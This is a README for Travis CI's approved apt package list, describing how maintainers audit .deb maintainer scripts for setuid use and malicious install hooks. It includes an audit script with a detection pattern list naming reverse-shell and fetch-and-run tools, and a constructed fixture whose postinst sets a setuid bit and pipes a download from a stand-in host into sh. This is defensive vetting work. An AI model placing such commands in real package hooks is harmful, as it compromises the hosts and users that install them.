This repo contains plain text files for the packages approved for installation in restricted build environments, specifically meant for use with the `apt_packages` addon in travis-build.
- Check the list of approved packages for your build environment (most likely `ubuntu-precise`).
- If it's not in there, check for existing issues requesting the package you want, and if one doesn't exist please open an issue requesting the package you need in the primary issues repo (and be sure to replace `__PACKAGE__` in the issue title 😉).
- Please be patient 😺
The approval process is mostly about ensuring the .deb installation hooks (the maintainer scripts `preinst`, `postinst`, `prerm` and `postrm`) don't do anything malicious or goofy that would open up a container to potential attack from a neighbor. The primary concern is protecting Travis CI customers and their property 🤘. The steps go like this (for ubuntu precise), much of which is also available as the `travis-download-deb-sources` executable within the vagrant box:
- Bring up the vagrant box: `vagrant up precise`
- SSH into the vagrant box: `vagrant ssh precise`
- Start the Travis Ruby container: `sudo -u ubuntu -i docker run -v /var/tmp:/var/tmp -d travis:ruby`
- Get the container's IP address: `docker inspect <container-id>` (it is under `NetworkSettings.IPAddress` in the output)
- SSH into the container: `ssh travis@<container-ip>` (password=`travis`)
- Freshen up the apt cache: `sudo apt-get update`
- Move into the shared dir or a sub directory, e.g.: `mkdir -p /var/tmp/deb-sources ; cd /var/tmp/deb-sources`
- Grab the package sources: `apt-get source <package-name>`
- Take a look at the package's extracted hooks: `cd <package-name>/debian ; vim *pre* *post* *inst*` (see inspecting packages)
- If no malicious or goofy bits are found, 👍 e.g.: `make add PACKAGE=<package-name>`
Or the slightly simplified version:

- Bring up the vagrant box: `vagrant up precise`
- SSH into the vagrant box: `vagrant ssh precise`
- Run the `travis-download-deb-sources` script for the package in question, e.g.: `sudo -u ubuntu -i travis-download-deb-sources git`
- Proceed with inspecting the `debian/*pre*` and `debian/*post*` hook scripts (see inspecting packages).
All together now, for `poppler-utils`:

```bash
# inside the vagrant box
sudo -u ubuntu -i -- travis-download-deb-sources poppler-utils
cd /var/tmp/shared/deb-sources/poppler-0.18.4/debian
vi *{pre,post,inst}*
# either inside the vagrant box in /vagrant or outside in the repo top level
make add PACKAGE=poppler-utils
git commit -v
```
The big things to worry about are whether any of the debian hook scripts are doing malicious or silly things, and whether the package being installed relies on setuid or setgid (binaries shipped with those bits set, or code that calls the `setuid`/`setgid` family).
```bash
# move into the `deb-sources` directory
pushd /var/tmp/shared/deb-sources
# look for `setuid`, `seteuid`, `setgid` and `setegid` usage, except for mentions in `install-sh`
grep -l -R -i -E 'set(uid|euid|gid|egid)' . | grep -v -E '\binstall-sh\b'
# if the above `grep` finds anything, take a closer look:
vi $(grep -l -R -i -E 'set(uid|euid|gid|egid)' . | grep -v -E '\binstall-sh\b')
# move into the `debian` directory
pushd $(find . -name debian | head -1)
# take a look at the hook scripts and such
shopt -s nullglob
vi *{pre,post,inst}*
```
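The grep above only catches code that names the `set*id` calls; a maintainer script can grant the same privileges without ever using those words (`chmod 4755`, `chmod u+s`, `setcap`), or pull in code at install time (`curl ... | sh`), which is exactly the "goofy bits" the manual read of the hook scripts is meant to catch. The following is an added example written for this page, not a script from this repo: it wraps the `set*id` grep, the hook-script glob and the `Package:` listing into shell functions, extends them with a heuristic pattern list of this example's own, and runs them against a constructed fake source tree standing in for `/var/tmp/shared/deb-sources` (the package names `goodpkg`/`badpkg`, their hook contents and the pattern list are all this example's assumptions).

```shell
#!/usr/bin/env bash
# Added example, not part of this repo: audit helpers for an extracted
# deb-sources tree such as /var/tmp/shared/deb-sources. The pattern list and
# the fixture packages (goodpkg, badpkg) are this example's own assumptions.
set -u

# Files under $1 mentioning set(uid|euid|gid|egid), minus autotools' install-sh.
find_setid_mentions() {
  grep -l -R -i -E 'set(uid|euid|gid|egid)' "$1" 2>/dev/null \
    | grep -v -E '(^|/)install-sh$' || true
}

# Maintainer scripts (*pre*, *post*, *inst*) in every debian/ dir under $1.
find_hook_scripts() {
  find "$1" -type d -name debian -exec sh -c '
    for f in "$1"/*pre* "$1"/*post* "$1"/*inst*; do
      [ -f "$f" ] && printf "%s\n" "$f"
    done; exit 0' _ {} \; | sort -u
}

# Hook-script lines that set privilege bits or fetch and run remote code.
# Heuristics only; a clean result is no substitute for reading the script.
flag_suspicious_lines() {
  local pattern
  pattern='chmod[^#]*([ugoa]*[+]s|[0-9]*[2-7][0-7]{3})'
  pattern="$pattern"'|setcap|sudoers|authorized_keys|crontab'
  pattern="$pattern"'|(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)'
  pattern="$pattern"'|(^|[[:space:];&|])nc[[:space:]]+-[le]|/dev/tcp'
  pattern="$pattern"'|base64[[:space:]]+(-d|--decode)'
  find_hook_scripts "$1" | while IFS= read -r f; do
    grep -n -H -E "$pattern" "$f" 2>/dev/null || true
  done
}

# Package: names from every debian/control under $1, on one line.
list_package_names() {
  find "$1" -type d -name debian -exec sh -c \
    'grep "^Package:" "$1/control" 2>/dev/null; exit 0' _ {} \; \
    | awk -F': *' '{ print $2 }' | sort | xargs echo
}

# Print a report; exit status 0 only if nothing was flagged.
audit_deb_sources() {
  local setid flagged
  setid=$(find_setid_mentions "$1")
  flagged=$(flag_suspicious_lines "$1")
  printf '== packages ==\n%s\n' "$(list_package_names "$1")"
  printf '== files mentioning set*id ==\n%s\n' "${setid:-(none)}"
  printf '== suspicious hook lines ==\n%s\n' "${flagged:-(none)}"
  [ -z "$setid" ] && [ -z "$flagged" ]
}

# Constructed fixture standing in for two extracted packages: one clean,
# one whose postinst sets a setuid bit and pipes a download into sh.
make_fixture() {
  mkdir -p "$1/goodpkg-1.0/debian" "$1/badpkg-2.0/debian"
  printf 'Package: goodpkg\n' > "$1/goodpkg-1.0/debian/control"
  printf '#!/bin/sh\nset -e\nldconfig\n' > "$1/goodpkg-1.0/debian/postinst"
  printf '# install-sh: handles setuid bits\n' > "$1/goodpkg-1.0/install-sh"
  printf 'Package: badpkg\n' > "$1/badpkg-2.0/debian/control"
  printf '#!/bin/sh\nset -e\nchmod 4755 /usr/bin/badhelper\ncurl -s http://example.invalid/b | sh\n' \
    > "$1/badpkg-2.0/debian/postinst"
  printf 'int main(void) { return setuid(0); }\n' > "$1/badpkg-2.0/helper.c"
}

# Usage on a real tree: audit_deb_sources /var/tmp/shared/deb-sources
# Demo run against the constructed fixture (expect findings for badpkg).
demo_root=$(mktemp -d)
make_fixture "$demo_root"
audit_deb_sources "$demo_root" || echo "audit FAILED: review the findings above"
rm -rf "$demo_root"
```

Anything `flag_suspicious_lines` prints is a prompt to open the file, not a verdict; the pattern list is deliberately loud (a `chmod` of a four-digit mode inside a path will trip it) because a false positive costs a minute of reading while a miss ships a setuid helper to every neighbor on the host.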
There is a helper script at `./bin/travis-list-apt-whitelist-issues` which may be used to query the open APT whitelist requests, as well as for automatic commit message formatting, e.g.:

```bash
# list everything
./bin/travis-list-apt-whitelist-issues
# show only the generated commit messages
./bin/travis-list-apt-whitelist-issues | jq -r .commit_message
```
```bash
# First things first
shopt -s nullglob
# Grab 1 or more packages
for pkg in abc def xyz ; do
  sudo -u ubuntu -- /usr/local/bin/travis-download-deb-sources "${pkg}" ;
done
# Edit any matches for set(uid|euid|gid|egid)
vim $(grep -l -R -i -E 'set(uid|euid|gid|egid)' . | grep -v -E '\binstall-sh\b')
# Edit any debian package files
for d in $(find . -name debian) ; do
  pushd "$d" && vim *{pre,post,inst}* ; popd ;
done
# If all clear, list all audited package names on one line
for d in $(find . -name debian) ; do
  pushd "$d" &>/dev/null && \
    grep ^Package control | awk -F: '{ print $2 }' | xargs echo ;
  popd &>/dev/null ;
done | xargs echo
# Back outside of the Vagrant box, pass this list of packages for addition
for pkg in abc def xyz ; do
  make add PACKAGE="$pkg" ;
done
# Grab the generated commit message
./bin/travis-list-apt-whitelist-issues | jq -r '.commit_message' | grep -A2 abc
# Commit and push, then restart all travis-build apps with a bit o' sleep
for app in $(hk apps | awk '/travis.*build-(prod|stag)/ { print $1 }') ; do
  hk restart -a "${app}" ;
  sleep 5 ;
done
```